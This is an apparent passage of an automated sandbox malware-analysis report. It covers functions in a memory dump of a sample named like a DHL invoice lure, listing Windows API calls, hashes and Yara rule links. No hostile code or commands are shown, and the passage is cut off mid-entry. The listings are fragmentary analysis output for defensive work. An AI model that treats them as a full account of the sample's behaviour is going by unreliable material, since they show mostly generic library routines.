                                                                                                                        • Instruction Fuzzy Hash: 99218E35600204AFD705EF65C988EAFBBE9EF49740F048068E94AEB762CB30AC04CB50
                                                                                                                        Function 0036CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0036CDC6
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0036CDE9
                                                                                                                          • Part of subcall function 00363820: RtlAllocateHeap.NTDLL(00000000,?,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6,?,00331129), ref: 00363852
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0036CE0F
                                                                                                                        • _free.LIBCMT ref: 0036CE22
                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0036CE31
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 336800556-0
                                                                                                                        • Opcode ID: 71249b9dddd358495c433568f737b94ed666047f778feb4296c2c9b76168eb51
                                                                                                                        • Instruction ID: aadf0bf7788fe4f3815e882ca13eadcaa321cdba6d6de9d4b336b48f673c3b39
                                                                                                                        • Opcode Fuzzy Hash: 71249b9dddd358495c433568f737b94ed666047f778feb4296c2c9b76168eb51
                                                                                                                        • Instruction Fuzzy Hash: A501D872A212157F632316B66C48C7B7D7DDEC6BA23169129F905C7104DA668D0182B4
                                                                                                                        Function 00349639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00349693
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 003496A2
                                                                                                                        • BeginPath.GDI32(?), ref: 003496B9
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 003496E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3225163088-0
                                                                                                                        • Opcode ID: a76eaa0d52031b4b60d46572c68463c7aafad5ee23c6dbcda195be58e5da2472
                                                                                                                        • Instruction ID: b51bd0366801e82ba304ff2594021399c26f55aa4e32aff79375f3b29b0571f7
                                                                                                                        • Opcode Fuzzy Hash: a76eaa0d52031b4b60d46572c68463c7aafad5ee23c6dbcda195be58e5da2472
                                                                                                                        • Instruction Fuzzy Hash: 742187B0812305EFDB129F65ED18BAA3BF9BB50365F160227F414BA1B0D374A851CF98
                                                                                                                        Function 00395711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memcmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2931989736-0
                                                                                                                        • Opcode ID: 1f8e02f0894decf80c229260fbd550aa6776128fb13327c8bf217085b2f98a0c
                                                                                                                        • Instruction ID: 7eda63687a5af1463584d41d524440321438e40f1007895826f09450900bc4c2
                                                                                                                        • Opcode Fuzzy Hash: 1f8e02f0894decf80c229260fbd550aa6776128fb13327c8bf217085b2f98a0c
                                                                                                                        • Instruction Fuzzy Hash: 2A01F1A6341A09BFEA0B6A50AD92FFB736D9B303A5F004024FD049E641F730EF5483A0
                                                                                                                        Function 00362DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,?,0035F2DE,00363863,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6), ref: 00362DFD
                                                                                                                        • _free.LIBCMT ref: 00362E32
                                                                                                                        • _free.LIBCMT ref: 00362E59
                                                                                                                        • SetLastError.KERNEL32(00000000,00331129), ref: 00362E66
                                                                                                                        • SetLastError.KERNEL32(00000000,00331129), ref: 00362E6F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3170660625-0
                                                                                                                        • Opcode ID: 64ba284c79399a1fb61112d9f48d714a04da7ab973cf73cac78882551c23f36b
                                                                                                                        • Instruction ID: 0959f250a0796f3d74ac0564189e1748b99fbdb479aa166c45a9ee2857da9924
                                                                                                                        • Opcode Fuzzy Hash: 64ba284c79399a1fb61112d9f48d714a04da7ab973cf73cac78882551c23f36b
                                                                                                                        • Instruction Fuzzy Hash: 1401F436645E0067C61327346D49D2B265DABD23A1F27D438F425E62DAEB368C118220
                                                                                                                        Function 0039000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?,?,0039035E), ref: 0039002B
                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?), ref: 00390046
                                                                                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?), ref: 00390054
                                                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?), ref: 00390064
                                                                                                                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?), ref: 00390070
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3897988419-0
                                                                                                                        • Opcode ID: 922197dea8e4ec4164d39adc31493122c4c7017bd2b9b4a1351964d14a2e8bc9
                                                                                                                        • Instruction ID: d16f3209618d3e712bc5561f685a904693ce9b400f52a9d94cda65bfd5d2c2f0
                                                                                                                        • Opcode Fuzzy Hash: 922197dea8e4ec4164d39adc31493122c4c7017bd2b9b4a1351964d14a2e8bc9
                                                                                                                        • Instruction Fuzzy Hash: 53018B76610204BFDF169F68DC04FAE7AEDEB44792F145124F909D2210E775ED408BA0
                                                                                                                        Function 0039E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0039E997
                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 0039E9A5
                                                                                                                        • Sleep.KERNEL32(00000000), ref: 0039E9AD
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0039E9B7
                                                                                                                        • Sleep.KERNEL32 ref: 0039E9F3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2833360925-0
                                                                                                                        • Opcode ID: 0ed2784ca579f956c7f3928bdcec1520f6e7addfb8161bbb4ca41de0f67fd0f0
                                                                                                                        • Instruction ID: de5f8a3087586b7017ad07987b8f7b39e6c90cd5382df53c46c9d972ecd0c1ee
                                                                                                                        • Opcode Fuzzy Hash: 0ed2784ca579f956c7f3928bdcec1520f6e7addfb8161bbb4ca41de0f67fd0f0
                                                                                                                        • Instruction Fuzzy Hash: 37015731C11629DBCF02EBE5DC59AEDBB7CFB08300F050946E502B2241CB38A950CBA1
                                                                                                                        Function 003910F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00391114
                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391120
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 0039112F
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391136
                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0039114D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 842720411-0
                                                                                                                        • Opcode ID: 0b5000002571fb3ac735974c4e422bc7b8ceb60583ab2b2d9ea706238c0fd441
                                                                                                                        • Instruction ID: f4b8a583e418e8e6c59502374420b1b21ab5e941ab30a55de65b41717774a9d4
                                                                                                                        • Opcode Fuzzy Hash: 0b5000002571fb3ac735974c4e422bc7b8ceb60583ab2b2d9ea706238c0fd441
                                                                                                                        • Instruction Fuzzy Hash: 40011979210205BFDB124FA5DC4DE6A3B6EEF893A0F254419FA49D7360DB31EC019B60
                                                                                                                        Function 00390FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00390FCA
                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00390FD6
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00390FE5
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00390FEC
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00391002
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 44706859-0
                                                                                                                        • Opcode ID: 8c82d1089d589c5e1b7f3af3456c0f29adbd9d6387f07880c916af338edfe7d4
                                                                                                                        • Instruction ID: d15f2590ac83ac9ca55a116c9e073da48f73978d64144c7e32aa92c01500f869
                                                                                                                        • Opcode Fuzzy Hash: 8c82d1089d589c5e1b7f3af3456c0f29adbd9d6387f07880c916af338edfe7d4
                                                                                                                        • Instruction Fuzzy Hash: 6DF04939210312ABDB224FA5AC49F563BADFF89762F154414FA49D6251CA71EC40CB60
                                                                                                                        Function 00391014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0039102A
                                                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00391036
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00391045
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0039104C
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00391062
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 44706859-0
                                                                                                                        • Opcode ID: 7e38ac65e4aaa94e32b4fa2620f5833328ab13785e8eaef0b0ae908c0312aeed
                                                                                                                        • Instruction ID: 5f4eb8d2b203193ee7c8d6312e85af05f6c3abc1ae045fb359b3f0e45eb9dc8b
                                                                                                                        • Opcode Fuzzy Hash: 7e38ac65e4aaa94e32b4fa2620f5833328ab13785e8eaef0b0ae908c0312aeed
                                                                                                                        • Instruction Fuzzy Hash: 30F06D39210312EBDB236FA5EC49F563BADFF897A1F150414FA49D7250CA71E8408B60
                                                                                                                        Function 003A030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A0324
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A0331
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A033E
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A034B
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A0358
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A0365
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2962429428-0
                                                                                                                        • Opcode ID: b1c7b035b07d8f8bbaa776d36cfb266c41b7c55c9d21c97e0744dda150176431
                                                                                                                        • Instruction ID: ac43862df00c9d4a57ab0154d64256190a85d199bdbf366b6b0ca21c88759b85
                                                                                                                        • Opcode Fuzzy Hash: b1c7b035b07d8f8bbaa776d36cfb266c41b7c55c9d21c97e0744dda150176431
                                                                                                                        • Instruction Fuzzy Hash: 6F01EE7A800B018FCB36AF66D880802FBF9FF613053068A3FD19652970C3B1A948CF80
                                                                                                                        Function 0036D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 0036D752
                                                                                                                          • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
                                                                                                                          • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
                                                                                                                        • _free.LIBCMT ref: 0036D764
                                                                                                                        • _free.LIBCMT ref: 0036D776
                                                                                                                        • _free.LIBCMT ref: 0036D788
                                                                                                                        • _free.LIBCMT ref: 0036D79A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: 02914dbda1f049de4e942836dbfd0ef79e9d63914e166abbaf347bc4457efa37
                                                                                                                        • Instruction ID: 25088ef0dd8a663047f7afbc113753d250dc0d5d45ecab6d462a12b974622e66
                                                                                                                        • Opcode Fuzzy Hash: 02914dbda1f049de4e942836dbfd0ef79e9d63914e166abbaf347bc4457efa37
                                                                                                                        • Instruction Fuzzy Hash: A1F01232B54608ABC627EF64FAC5C2777DDBB46750B969805F048DB509CB30FC90C665
                                                                                                                        Function 003622A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 003622BE
                                                                                                                          • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
                                                                                                                          • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
                                                                                                                        • _free.LIBCMT ref: 003622D0
                                                                                                                        • _free.LIBCMT ref: 003622E3
                                                                                                                        • _free.LIBCMT ref: 003622F4
                                                                                                                        • _free.LIBCMT ref: 00362305
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: e39be8d8c096aafcc24cab3b3a44b49a4f6556971ba00d3a94f8e13cf5b1d85a
                                                                                                                        • Instruction ID: c698bccd591acda3dcc594fb1fae344dfe7885d17adda8952b4225fd206e1edb
                                                                                                                        • Opcode Fuzzy Hash: e39be8d8c096aafcc24cab3b3a44b49a4f6556971ba00d3a94f8e13cf5b1d85a
                                                                                                                        • Instruction Fuzzy Hash: BEF0B4705509118BC717AF54BE0191A3BE4F71A790F02456EF000F6279C7750821FFE9
                                                                                                                        Function 003495C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EndPath.GDI32(?), ref: 003495D4
                                                                                                                        • StrokeAndFillPath.GDI32(?,?,003871F7,00000000,?,?,?), ref: 003495F0
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00349603
                                                                                                                        • DeleteObject.GDI32 ref: 00349616
                                                                                                                        • StrokePath.GDI32(?), ref: 00349631
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2625713937-0
                                                                                                                        • Opcode ID: 5cdcc12b845f7277d1ffe16f25359259770ae86d52786bc99064f619a5adf66a
                                                                                                                        • Instruction ID: 85e92859b8d61c1a982ebb4056d3cc0f03d467180297ba19382af70a4e8a123a
                                                                                                                        • Opcode Fuzzy Hash: 5cdcc12b845f7277d1ffe16f25359259770ae86d52786bc99064f619a5adf66a
                                                                                                                        • Instruction Fuzzy Hash: 83F04F71005204EFDB135F65EE1CB653FA9BB01332F148225F469A90F0C734A991DF28
                                                                                                                        Function 00360F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
